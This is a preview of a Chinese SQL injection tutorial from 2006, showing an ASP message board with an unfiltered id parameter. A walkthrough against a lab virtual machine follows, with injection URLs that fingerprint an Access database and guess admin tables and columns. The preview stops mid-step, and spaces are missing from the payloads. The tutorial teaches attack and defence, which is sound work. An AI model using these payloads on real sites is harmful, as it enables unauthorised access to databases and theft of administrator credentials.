sql注入攻擊技術(shù)初探.doc

sql注入攻擊技術(shù)初探.doc

ID:12780479

大小:7.68 MB

頁數(shù):46頁

時間:2018-07-19

sql注入攻擊技術(shù)初探.doc_第1頁
sql注入攻擊技術(shù)初探.doc_第2頁
sql注入攻擊技術(shù)初探.doc_第3頁
sql注入攻擊技術(shù)初探.doc_第4頁
sql注入攻擊技術(shù)初探.doc_第5頁
資源描述:

《sql注入攻擊技術(shù)初探.doc》由會員上傳分享,免費在線閱讀,更多相關(guān)內(nèi)容在教育資源-天天文庫。

1、Sql注入攻擊技術(shù)初探整理:BlackhumorSite:www.hack41.cn2006.6.19完稿簡介:sql注入一般針對基于web平臺的應用程序由于很多時候程序員在編寫程序的時候沒有對瀏覽器端提交的參數(shù)進行合法的判斷,可以由用戶自己修改構(gòu)造參數(shù)(也可以是sql查詢語句),并傳遞至服務器端獲取想要的敏感信息甚至執(zhí)行危險代碼和系統(tǒng)命令就形成了sql注入漏洞,時至今日任然有很大一部分網(wǎng)站存在sql注入漏洞,可想而知sql注入攻擊的危害,下面就目前sql注入攻擊技術(shù)進行總結(jié),讓我們更加了解這種攻擊與防御方法一、access數(shù)據(jù)庫注入攻擊技術(shù)目前國內(nèi)很

2、大一部分網(wǎng)站都是采用asp+access搭建成的本文演示網(wǎng)站是在虛擬機搭建的一套留言板程序http://192.168.80.128:8181/bbs/index.asp(留言板首頁)點擊公告連接此時注意觀察地址欄http://192.168.80.128:8181/bbs/gshow.asp?id=1Gshow.asp后面跟了一個id參數(shù),其值為數(shù)字1,下面我們來看一下服務器端的gshow.asp中的讀取公告內(nèi)容的代碼<%setrs=server.CreateObject("adodb.recordset")sql="select*fromgongg

3、aowhereid="&request.QueryString("id")rs.opensql,conn,1,3ifrs.eoforrs.bofthenresponse.write("暫無公告內(nèi)容")else%><%=rs("titles")%>
<%=rs("content")%><%=rs("addtime")%>

<%endifrs.closesetrs=nothing%>可以很明顯的看到程序在接收到瀏覽器端傳遞過來的id參數(shù)時,沒有經(jīng)過任何過濾就直接進入數(shù)據(jù)接查詢了,那么我們怎么來通過這個

4、漏洞來獲取我們想要的信息呢,測試之前我們是不知道對方所使用的數(shù)據(jù)庫類型也不知道數(shù)據(jù)庫里面有哪些表、字段等等(類似blackboxtest),一般情況下asp可以與access和mssql數(shù)據(jù)庫結(jié)合,首先我們來判斷一下數(shù)據(jù)庫類型在id參數(shù)后面加上andexists(select*frommsysobjects)注:mysysobjects是access的系統(tǒng)表完整的測試語句:http://192.168.80.128:8181/bbs/gshow.asp?id=1andexists(select*frommsysobjects)回車提交到服務器端如圖,根

5、據(jù)服務器返回結(jié)果,(MicrosoftJETDatabaseEngine錯誤'80040e09'不能讀取記錄;在'msysobjects'上沒有讀取數(shù)據(jù)權(quán)限。/bbs/gshow.asp,行11)說明存在msysobjects表,也就是說后臺是采用的access數(shù)據(jù)庫(若服務器返回[Microsoft][ODBCSQLServerDriver][SQLServer]對象名'msysobjects'無效。則說明是sqlserver數(shù)據(jù)庫,相關(guān)方法會在下面講述,這里重點討論access數(shù)據(jù)庫)下面我們來進一步獲取我們想要的信息一般網(wǎng)站重要的信息就是后臺管理

6、員登陸帳號密碼了,我們提交http://192.168.80.128:8181/bbs/gshow.asp?id=1andexists(select*fromusers)(判斷數(shù)據(jù)庫中是否存在users表)根據(jù)圖中返回結(jié)果提示users表不存在,那么我們繼續(xù)來提交http://192.168.80.128:8181/bbs/gshow.asp?id=1andexists(select*fromadmin服務器端返回的數(shù)據(jù)和http://192.168.80.128:8181/bbs/gshow.asp?id=1一樣這是因為參數(shù)一起帶入數(shù)據(jù)庫里面就變成了

7、select*fromgonggaowhereid=1andexists(select*fromadmin)由于存在admin表條件成立就和select*fromgonggaowhereid=1的查詢返回結(jié)果一樣了,找到了admin表現(xiàn)在就以此類推猜測字段提交http://192.168.80.128:8181/bbs/gshow.asp?id=1andexists(selectuserfromadmin)服務器返回”至少一個參數(shù)沒有被指定值”說明不存在user字段,繼續(xù)提交http://192.168.80.128:8181/bbs/gshow.as

8、p?id=1andexists(selectadminfromadmin)服務器返回正常,說明

當前文檔最多預覽五頁,下載文檔查看全文

此文檔下載收益歸作者所有

當前文檔最多預覽五頁,下載文檔查看全文
溫馨提示:
1. 部分包含數(shù)學公式或PPT動畫的文件,查看預覽時可能會顯示錯亂或異常,文件下載后無此問題,請放心下載。
2. 本文檔由用戶上傳,版權(quán)歸屬用戶,天天文庫負責整理代發(fā)布。如果您對本文檔版權(quán)有爭議請及時聯(lián)系客服。
3. 下載前請仔細閱讀文檔內(nèi)容,確認文檔內(nèi)容符合您的需求后進行下載,若出現(xiàn)內(nèi)容與標題不符可向本站投訴處理。
4. 下載文檔時可能由于網(wǎng)絡波動等原因無法下載或下載錯誤,付費完成后未能成功下載的用戶請聯(lián)系客服處理。
相關(guān)標簽